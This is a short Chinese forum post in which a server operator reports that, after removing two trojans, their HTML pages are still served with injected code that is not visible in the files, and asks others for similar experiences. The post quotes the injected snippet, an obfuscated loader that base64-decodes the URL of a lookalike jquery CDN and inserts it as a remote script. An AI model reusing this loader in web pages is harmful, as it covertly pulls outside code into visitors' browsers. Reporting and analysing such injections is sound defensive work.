按照官方的指导,自己手动清理了两个木马,但是访问html文件还是有被挂马的代码,这并不是普通的文件挂马,通过查看源文件发现不了,感觉Nginx挂马没有清除干净,服务器还是存在被提权的情况。代码如下:
<script>(function() {var hm = document.createElement("script");hm.src = atob("aHR0cHM6Ly9jZG4uYm9vdHNjZG4ub3JnL2FqYXgvbGlicy9qcXVlcnkvMy42LjEvanF1ZXJ5Lmpz");var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();</script>
有没有人有相同的经历?
|
|